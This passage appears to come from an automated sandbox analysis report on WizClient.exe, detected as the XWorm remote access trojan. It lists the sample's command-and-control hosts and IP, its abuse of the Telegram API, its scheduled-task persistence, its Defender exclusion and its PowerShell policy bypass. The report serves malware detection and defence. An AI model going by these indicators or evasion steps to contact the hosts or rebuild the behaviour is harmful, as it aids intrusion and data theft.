            Source: C:\Users\user\Desktop\WizClient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: WizClient.exe, 00000003.00000002.2589619208.000000001B297000.00000004.00000020.00020000.00000000.sdmp, WizClient.exe, 00000003.00000002.2557559588.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, WizClient.exe, 00000003.00000002.2593727968.000000001BD5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: WizClient.exe, 00000003.00000002.2557559588.00000000006B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ws Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\WizClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\WizClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\WizClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: WizClient.exe, type: SAMPLE
            Source: Yara matchFile source: 3.0.WizClient.exe.230000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000000.1277877176.0000000000232000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: WizClient.exe PID: 7012, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\WizClient.exe, type: DROPPED

            Remote Access Functionality

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: WizClient.exe, type: SAMPLE
            Source: Yara matchFile source: 3.0.WizClient.exe.230000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000000.1277877176.0000000000232000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: WizClient.exe PID: 7012, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\WizClient.exe, type: DROPPED

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		11
            Disable or Modify Tools            		OS Credential Dumping1
            File and Directory Discovery            		Remote Services11
            Archive Collected Data            		1
            Web Service            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job            		1
            Scheduled Task/Job            		12
            Process Injection            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory13
            System Information Discovery            		Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell            		21
            Registry Run Keys / Startup Folder            		1
            Scheduled Task/Job            		11
            Obfuscated Files or Information            		Security Account Manager1
            Query Registry            		SMB/Windows Admin SharesData from Network Shared Drive11
            Encrypted Channel            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
            Registry Run Keys / Startup Folder            		2
            Software Packing            		NTDS121
            Security Software Discovery            		Distributed Component Object ModelInput Capture1
            Non-Standard Port            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets2
            Process Discovery            		SSHKeylogging2
            Non-Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Masquerading            		Cached Domain Credentials31
            Virtualization/Sandbox Evasion            		VNCGUI Input Capture13
            Application Layer Protocol            		Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
            Virtualization/Sandbox Evasion            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Process Injection            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1636114 Sample: WizClient.exe Startdate: 12/03/2025 Architecture: WINDOWS Score: 100 40 api.telegram.org 2->40 42 amazon-astrology.gl.at.ply.gg 2->42 44 i.ibb.co 2->44 52 Suricata IDS alerts for network traffic 2->52 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 60 11 other signatures 2->60 8 WizClient.exe 15 8 2->8         started        13 WizClient.exe 2->13         started        15 WizClient.exe 2->15         started        17 2 other processes 2->17 signatures3 58 Uses the Telegram API (likely for C&C communication) 40->58 process4 dnsIp5 46 amazon-astrology.gl.at.ply.gg 147.185.221.26, 49717, 49722, 49728 SALSGIVERUS United States 8->46 48 api.telegram.org 149.154.167.220, 443, 49714 TELEGRAMRU United Kingdom 8->48 50 2 other IPs or domains 8->50 36 C:\Users\user\AppData\Local\WizClient.exe, PE32 8->36 dropped 64 Protects its processes via BreakOnTermination flag 8->64 66 Bypasses PowerShell execution policy 8->66 68 Uses schtasks.exe or at.exe to add and modify task schedules 8->68 70 Adds a directory exclusion to Windows Defender 8->70 19 powershell.exe 23 8->19         started        22 powershell.exe 20 8->22         started        24 powershell.exe 23 8->24         started        26 schtasks.exe 8->26         started        38 C:\Users\user\AppData\...\WizClient.exe.log, CSV 13->38 dropped 72 Antivirus detection for dropped file 13->72 74 Multi AV Scanner detection for dropped file 13->74 file6 signatures7 process8 signatures9 62 Loading BitLocker PowerShell Module 19->62 28 conhost.exe 19->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        process10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.